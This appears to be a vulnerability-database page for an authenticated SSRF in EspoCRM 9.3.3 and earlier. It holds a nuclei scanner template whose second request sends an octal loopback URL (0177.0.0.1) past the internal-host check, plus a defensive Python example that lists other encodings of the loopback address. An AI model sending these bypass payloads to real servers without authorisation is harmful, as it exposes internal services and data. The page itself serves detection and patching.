EspoCRM <= 9.3.3 - Server-Side Request Forgery

Published: 05 Jul 2026 03:01:21 | Reported by: ProjectDiscovery | Type: nuclei | Source: github.com | 17 views

Authenticated SSRF in EspoCRM <= 9.3.3: the internal-host check in HostCheck::isNotInternalHost() can be bypassed with alternative IPv4 notation (for example octal 0177.0.0.1 for 127.0.0.1), letting any authenticated user reach internal resources through the /api/v1/Attachment/fromImageUrl endpoint. Fixed in 9.3.4.

Related

Reporter: Title (Published)

GithubExploit: Exploit for Server-Side Request Forgery in Espocrm (8 May 2026 17:22)
ATTACKERKB: CVE-2026-33534 (13 Apr 2026 19:20)
Circl: CVE-2026-33534 (8 May 2026 14:59)
CNNVD: EspoCRM code issue vulnerability (original title: EspoCRM 代码问题漏洞) (13 Apr 2026 00:00)
CVE: CVE-2026-33534 (13 Apr 2026 19:20)
Cvelist: CVE-2026-33534 EspoCRM has authenticated SSRF via internal-host validation bypass using alternative IPv4 notation (13 Apr 2026 19:20)
Exploit DB: EspoCRM 9.3.3 - SSRF (27 May 2026 00:00)
EUVD: EUVD-2026-22079 (13 Apr 2026 19:20)
NVD: CVE-2026-33534 (13 Apr 2026 20:16)
Packet Storm: EspoCRM 9.3.3 Server-Side Request Forgery (29 May 2026 00:00)
id: CVE-2026-33534

info:
  name: EspoCRM <= 9.3.3 - Server-Side Request Forgery
  author: EntroVyx
  severity: medium
  description: |
    EspoCRM <= 9.3.3 contains an authenticated server-side request forgery caused by improper internal-host validation using alternative IPv4 formats in HostCheck::isNotInternalHost(), letting authenticated users access internal resources via /api/v1/Attachment/fromImageUrl endpoint.
  impact: |
    Authenticated attackers can access internal network resources, potentially exposing sensitive data or internal services.
  remediation: |
    Upgrade to version 9.3.4 or later.
  reference:
    - https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
    - https://nvd.nist.gov/vuln/detail/CVE-2026-33534
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2026-33534
    epss-score: 0.01978
    epss-percentile: 0.78104
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 2
    vendor: espocrm
    product: espocrm
  tags: cve,cve2026,espocrm,ssrf,authenticated,intrusive

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/v1/Attachment/fromImageUrl HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}
        Content-Type: application/json

        {"url":"http://127.0.0.1:80/client/img/logo-light.svg","field":"avatar","parentType":"User"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 403'
        internal: true

  - raw:
      - |
        POST /api/v1/Attachment/fromImageUrl HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}
        Content-Type: application/json

        {"url":"http://0177.0.0.1:80/client/img/logo-light.svg","field":"avatar","parentType":"User"}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "\"id\"", "\"field\":\"avatar\"", "\"parentType\":\"User\"", "0177.0.0.1")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100f2dc5b247a3801b2c1e1d77bface7aa1e2d0dc0206d30ad6ebbb997935483abd022100e2be7b434135d1fa8210f0ea86144a628a50c932289b28c2e32de8cb2176add3:922c64590222798bb761d5b6d8e72950
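The template above exercises the bypass from the outside: the literal 127.0.0.1 is refused with a 403, while the octal spelling 0177.0.0.1 names the same loopback address and is fetched. The Python below is an added example, not code from EspoCRM, ProjectDiscovery or the template author, and it is not a reconstruction of HostCheck::isNotInternalHost(), whose internals this page does not show. It implements the permissive inet_aton() address grammar that network stacks and URL fetchers accept, contrasts an illustrative string-prefix filter (an assumed failure mode, not the real check) with a check that decides on the canonical address, and goes beyond octal to the hex, short and integer forms the same grammar allows. The resolve parameter, the naive filter's prefix list and the sample addresses are assumptions made for the demonstration.

```python
"""Canonicalise IPv4 literals before an internal-host check (added example)."""
import ipaddress
import re
from urllib.parse import urlsplit

# Grammar accepted by BSD/glibc inet_aton(): one to four dot-separated parts,
# each decimal, octal (leading 0) or hex (leading 0x); the last part fills the
# remaining bytes. A text filter that only knows "127.0.0.1" never sees
# 0177.0.0.1, 0x7f.1, 127.1 or 2130706433 as the same address.
_HEX = re.compile(r"0[xX][0-9a-fA-F]+")
_OCT = re.compile(r"0[0-7]*")
_DEC = re.compile(r"[1-9][0-9]*")


def parse_legacy_ipv4(text):
    """Return the canonical dotted-quad for an inet_aton-style literal, else None."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        if _HEX.fullmatch(part):
            values.append(int(part, 16))
        elif _OCT.fullmatch(part):
            values.append(int(part, 8))
        elif _DEC.fullmatch(part):
            values.append(int(part, 10))
        else:
            return None
    *head, last = values
    if any(v > 0xFF for v in head):
        return None
    tail_bytes = 4 - len(head)
    if last >= 1 << (8 * tail_bytes):
        return None
    addr = 0
    for v in head:
        addr = (addr << 8) | v
    addr = (addr << (8 * tail_bytes)) | last
    return str(ipaddress.IPv4Address(addr))


def naive_is_internal(host):
    """Illustrative string-prefix filter (an assumption about how such checks
    fail, NOT EspoCRM's HostCheck code). It compares spellings, not addresses."""
    host = host.lower()
    if host in ("localhost", "0.0.0.0"):
        return True
    if host.startswith(("127.", "10.", "192.168.", "169.254.")):
        return True
    return re.fullmatch(r"172\.(1[6-9]|2\d|3[01])\..*", host) is not None


def to_ip_address(host):
    """Map a URL host to an ipaddress object, or None when it is a DNS name."""
    host = host.strip("[]")  # IPv6 literals are bracketed inside URLs
    legacy = parse_legacy_ipv4(host)
    if legacy is not None:
        return ipaddress.ip_address(legacy)
    # Legacy parse runs first: ipaddress before the CVE-2021-29921 fix read
    # "0177.0.0.1" as 177.0.0.1, and current versions reject it outright.
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return None


def is_internal_address(ip):
    """True for any address a fetcher must not be allowed to reach."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def hardened_is_internal(host, resolve=None):
    """Decide on the canonical address, not the spelling. `resolve` (assumed
    helper) maps a name to its address strings, e.g. via getaddrinfo; without
    it a DNS name fails closed."""
    ip = to_ip_address(host)
    if ip is not None:
        return is_internal_address(ip)
    name = host.lower().rstrip(".")
    if name == "localhost" or name.endswith(".localhost"):
        return True
    if resolve is None:
        return True  # fail closed: a name cannot be judged without resolving it
    addrs = [to_ip_address(a) for a in resolve(name)]
    # Every resolved address must be external; re-check at connect time and
    # after each redirect, or DNS rebinding and 302s reopen the hole.
    return not addrs or any(a is None or is_internal_address(a) for a in addrs)


def check_url(url):
    """Apply both checks to the host of a fetch URL, as the endpoint would."""
    host = urlsplit(url).hostname or ""
    return {"host": host,
            "naive_blocks": naive_is_internal(host),
            "hardened_blocks": hardened_is_internal(host)}


if __name__ == "__main__":
    for u in ("http://127.0.0.1:80/client/img/logo-light.svg",
              "http://0177.0.0.1:80/client/img/logo-light.svg",
              "http://0x7f.1/", "http://2130706433/", "http://[::ffff:127.0.0.1]/"):
        print(u, check_url(u))
```

The check belongs at the point where the server is about to open the connection, on the address it will actually connect to, and must be repeated for every redirect the fetcher follows. Note also that the template is tagged intrusive for a reason: a successful second request creates an Attachment record on the target, so clean up after an authorised scan.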


Updated: 08 May 2026 14:59 (current)
Vulners AI Score: 5.9 (Medium risk)
CVSS 3.1: 4.3
EPSS: 0.01978